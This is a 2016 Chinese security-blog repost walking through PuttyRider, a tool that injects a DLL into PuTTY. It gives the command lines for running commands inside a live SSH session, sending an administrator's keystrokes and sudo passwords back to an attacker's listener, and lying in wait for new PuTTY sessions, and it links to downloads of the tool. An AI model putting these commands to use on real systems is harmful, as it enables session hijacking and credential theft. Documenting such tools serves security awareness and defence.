Putty的噩梦——渗透工具PuttyRider使用心得分享
- - 行业应用 - ITeye博客近日,我们的360监控平台,检测到一个叫PuttyRider渗透工具,小编立马下回来研究,整理一篇工具的使用心得分享给大家. 我们在入侵到一台主机的时候,经常会看到管理员的桌面会放着putty.exe,这说明有很大的可能性管理员是使用putty远程管理主机的. 该工具主要是针对SSH客户端putty的利用,采用DLL注入的方式,来实现各种猥琐的利用姿势.
Putty的噩梦——渗透工具PuttyRider使用心得分享
标签:
putty
噩梦
渗透
| 发表时间:2016-05-18 19:39 | 作者:hetaoo
出处:http://www.iteye.com
近日,我们的360监控平台,检测到一个叫PuttyRider渗透工具,小编立马下回来研究,整理一篇工具的使用心得分享给大家。
我们在入侵到一台主机的时候,经常会看到管理员的桌面会放着putty.exe,这说明有很大的可能性管理员是使用putty远程管理主机的。该工具主要是针对SSH客户端putty的利用,采用DLL注入的方式,来实现各种猥琐的利用姿势。我依次演示该工具的三种利用场景
1.当你远程控制对方主机的时候,管理员正好用putty连接着远程主机
这种情景,我们只要直接注入命令到当前的putty进程,就可以利用,非常简单,缺点是没有回显。
使用puttyRider.exe –l 查看当前进程中putty正在连接的远程主机信息,这里不光能得到远程主机的IP地址和putty进程号,还能在Injected列看到当前是NO,说明我们还没有进程注入。
我们使用puttyrider.exe –p 0 –f –c ifconfig,就把ifconfig命令注入到当前的putty会话了,就达到远程命令执行的目的了。再次puttyRider.exe –l 看一下,发现injected列是yes了,说明我们注入进程成功了。
2.使用反弹的方式实时看管理员的输入
除了利用第一种方法直接注入命令,我们还可以反弹出来,实时看到对方管理员在putty里的输入,即使管理输入sudo这种命令,我们也能够看到他输入的明文密码。但是这种利用的前提是,对方管理员正在用PUTTY连接的主机可以反弹到你监听的IP地址,防火墙限制的不是很严。
Puttyrider.exe –p 0 –r 我监听的IP:端口
执行后,我们就可以看到结果了
3.我运气不这么好,对方管理员当前没有正在使用PUTTY管理远程主机
这种情况应该最常见了,软件作者也考虑到了,给我们提供了-w参数,他会让puttyrider后台监视新起来的进程,然后反弹到我们的主机,也能实时的看到对方的操作哦,包括输入的账号
Puttyrider.exe –w –r 我监听的IP:端口号
当执行完这个命令后,只要管理员下次再次开启PUTTY的时候,我们就能在监听的9999端口看到她的SHELL了
最后如果想研究工具细节的童鞋,可以在
https://codeload.github.com/seastorm/PuttyRider/zip/master下载源码,深入学习 :)
编译好的二进制文件可以在
https://github.com/seastorm/PuttyRider/releases/download/0.1/PuttyRider-bin.zip下载
本文由 360安全播报 原创发布,如需转载请注明来源及本文地址。
已有 0 人发表留言,猛击->> 这里<<-参与讨论
ITeye推荐
相关 [putty 噩梦 渗透] 推荐:
PuTTY 0.61发布
- Larry Li - Solidot经历四年开发之后,PuTTY的版本号从0.60增加到了0.61. PuTTY是开源终端模拟器,可用作Telnet/SSH/rlogin/纯TCP以及串行阜的客户端. 0.61主要是修正bug,改进性能,增加新特性,支持GSSAPI SSH2认证,更快的SSH密钥交换,兼容Windows 7,支持Win7的Jump List,等等.
InucurryFont,噩梦字体
- 季季 - 比特客栈的文艺复兴为什么字体名称不是Incubator. 因为魔法少女小圆并不是Gekidan Inu Curry(劇団イヌカレー)第一次使用这种字体. 请见天元突破官方小剧场之オレノ×××ハウチュウヒトツ. 下载来源,本地下载,字体研究.
【转载】紧急:中文版putty、WinSCP、SSH Secure后门!请立即更新
- - 素包子原文在http://www.youxia.org/2012/01/putty-WinSCP-SecureCRT-Backdoor.html 我再加个图 我曾经有一个朋友的服务器就是出现了下面说的1 3 4的问题,终于找到源头了. 凡是使用中文版putty、WinSCP、SSH Secure的用户请注意,它们很可能带有病毒,会导致root密码被盗走,进而盗取或破坏数据,利用服务器发攻击包等.
噩梦背后的秘密
- JR - 译言-每日精品译文推荐来源The deep meaning of nightmares. 噩梦,正如坠入地狱一样的恐怖,它的存在有意义吗. 没人能逃脱噩梦的魔爪,噩梦为我们敲醒了警钟,而不是带来了伤害. 我们不能忽视它们,更不能不回忆所做过的噩梦. 噩梦是痛苦的,但同时也是必须的治疗药品. 通过这样的情感发泄,它们可以起到很重要的治愈作用,同时警告我们不曾留意的心理失衡状态.
[警告]部分汉化 PuTTY 和 WinSCP 软件存在后门 | 小众软件 > 日志
- - 小众软件 - Appinn据可靠消息,目前国内部分汉化版 PuTTY、WinSCP、SSH Secure 软件存在后门,会恶意泄漏用户名、密码等信息,并导致服务器被攻击. 请立即停止使用不可靠的汉化版或中文版相关软件,并重新从官方地址下载. 这也是小众始终推荐从官方下载软件的原因之一,安全无小事. PuTTY 官网: http://www.chiark.greenend.org.uk/~sgtatham/putty/.
再谈内网渗透
- - FreebuF.COM前言: 看了@g.r0b1n文章《浅谈内网渗透》抑制不住自己冲动的心情,写一篇《再谈内网渗透》,希望以后有朋友能更新《详谈内网渗透》 在我的脑子里面我始终认为,一次渗透至少要控制被渗透对象80%以上服务器才能算得上一次成功的渗透. 正文: 我没有内网域里面某个机器的权限,我只有一个存在漏洞的web页面,而我的目的就利用这个存在漏洞的web入侵线上服务器,然后从IDC网络入侵到办公网,到了办公网络再入侵域控服务器,很多较大的互联网公司IDC内网与运维网相通的,然而运维内网一般包含在办公网络中.
现代API渗透技术
- -API 有多种不同的形式,攻击 API 的方法会因这些形式的不同而有很大差异. 在一篇文章中涵盖所有攻击类型是不可能的,下面我重点介绍其中一部分. 与 Web 应用程序非常相似,API 可以具有不同级别的可见性. 有些可以通过互联网访问,而有些则只能在内部使用. API 攻击方式之一就是简单地访问你应该无法访问的 API.
结对编程——我的噩梦
- - 博客园_知识库 英文原文: Pair Programming - My Personal Nightmare. 自从 极限编程诞生起,我就一直在听说结对编程是个 好东西. 所有的敏捷传教士们都在告诉我们:结对编程能提高代码质量,有助知识共享,甚至激发开发效率,同时,还能深度拉近程序员之间的感情关系(参看 拥抱编程).
[笑话连篇] 央行加息 银行柜员的噩梦 噩梦!!!! (转载)
- liangzi9 - 水木社区 今日十大热门话题发信人: xyhou (逍遥侯), 信区: Joke. 标 题: 央行加息 银行柜员的噩梦 噩梦. 发信站: 水木社区 (Wed Apr 6 10:26:10 2011), 站内. 【 以下文字转载自 MyWallet 讨论区 】. 发信人: JJxDD (~反指悲催不卖不涨不空不跌帝~), 信区: MyWallet.